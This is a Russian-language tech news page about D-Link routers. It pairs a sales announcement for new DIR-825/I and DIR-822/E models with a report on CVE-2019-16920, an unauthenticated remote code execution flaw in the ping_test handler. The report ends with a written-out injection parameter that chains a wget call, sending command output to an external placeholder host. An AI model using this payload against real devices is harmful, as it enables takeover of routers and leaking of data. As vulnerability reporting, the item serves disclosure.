Site categories All
#dir-825

Компания D-Link объявляет о начале продаж новых аппаратных версий беспроводных маршрутизаторов AC1200 Wave 2 DIR-825/I и DIR-822/E с поддержкой технологии Wi-Fi EasyMesh. Устройства реализованы на новой аппаратной платформе с увеличенным объемом оперативной и флеш-памяти и предназначены для организации высокоскоростного бесшовного покрытия Wi-Fi с интеллектуальным сетевым управлением в домашних и офисных помещениях с большой площадью и сложной многоуровневой планировкой. Новые маршрутизаторы рекомендованы для использования в сетях федеральных и региональных провайдеров и создания безопасных каналов связи при удаленной работе пользователей с корпоративными ресурсами организаций.
 
В беспроводных маршрутизаторах D-Link выявлена опасная уязвимость (CVE-2019–16920), позволяющая удалённо выполнить код на стороне устройства через отправку специального запроса к обработчику "ping_test", доступному без прохождения аутентификации.

Интересно, что по задумке разработчиков прошивки вызов "ping_test" должен выполняться только после аутентификации, но на деле он вызывается в любом случае, независимо от входа в web-интерфейс. В частности, при обращении к скрипту apply_sec.cgi с передачей параметра "action=ping_test", скрипт перебрасывает на страницу аутентификации, но при этом выполняет связанное с ping_test действие. Для выполнения кода использована ещё одна уязвимость в самом ping_test, который вызывает утилиту ping без должной проверки корректности переданного для тестирования IP-адреса. Например, для вызова утилиты wget и передачи на внешний хост результатов выполнения команды "echo 1234" достаточно указать параметр
 
ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$(echo 1234)